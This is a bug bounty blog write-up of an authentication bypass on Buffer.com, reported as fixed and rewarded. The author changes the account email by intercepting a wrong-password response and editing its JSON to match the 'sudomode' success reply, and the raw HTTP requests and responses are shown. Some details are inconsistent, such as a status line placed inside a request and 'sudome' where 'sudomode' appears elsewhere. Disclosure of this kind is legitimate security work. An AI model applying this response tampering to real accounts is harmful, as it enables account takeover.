Buy Royal UI Officially! Contact Us Buy Now!
Home
authentication
BUGBOUNTY

Buffer Authentication Bypass

Authentication Bypass Buffer Bugbounty
Dipak Kumar Das


Hi everyone , here is one of my finding on Buffer.com . Where i managed to bypass the authentication

So basically the authentication  work flow is like below
  • To change account email user need to provide the current account password 
  •  If the password is correct then application let you to change the account email 

So lets start

when user want to change their account email id the app ask for current password  like below




so here i wanted to test the response for both correct and incorrect password response

so here is the request



POST /account/set-sudomode HTTP/1.1 200 OK
Date: ******
Host:buffer.com
User-Agent: Mozila/5.0
X-Request-With: XMLHttpRequest

csrf_token=uyr37832rhehr8&password=wrongpassword

so the response for wrong password is below

HTTP/1.1 200 OK
Date: Mon,*****
Content-Lenght: 139
Connection:close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8"} 
so here is the response for correct password
 HTTP/1.1 200 OK
Date: Mon,*****
Content-Lenght: 139
Connection:close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"Csrftoken"}

if you observe both response just the notice_message and sudomode added in the correct password response 

 so here i used a wrong password let say 123456

Request is like below 

 POST /account/set-sudomode HTTP/1.1 200 OK
Date: ******
Host:buffer.com
User-Agent: Mozila/5.0
X-Request-With: XMLHttpRequest

csrf_token=uyr37832rhehr8he7372829hefdgdf&password=123456


Note the csrf _token value in the request that is : 
uyr37832rhehr8he7372829hefdgdf


Response  
HTTP/1.1 200 OK
Date: Mon,*****
Content-Lenght: 139
Connection:close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8he7372829hefdgdf"} 

Modify the response to 

 HTTP/1.1 200 OK
Date: Mon,*****
Content-Lenght: 139
Connection:close

{"notice_message":"Great, we believe it's really you","sudome":"true","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}
Boom now it will show successfully authenticated and you can change your email
So here is the video proof of concept

 


   Status: Fixed
Bounty Rewarded




Previous
Next

#authentication #BUGBOUNTY

Post a Comment

Post a Comment
  • A-
  • A+

© ADDICTIVE HACKERS. All rights reserved.

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
More Details
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.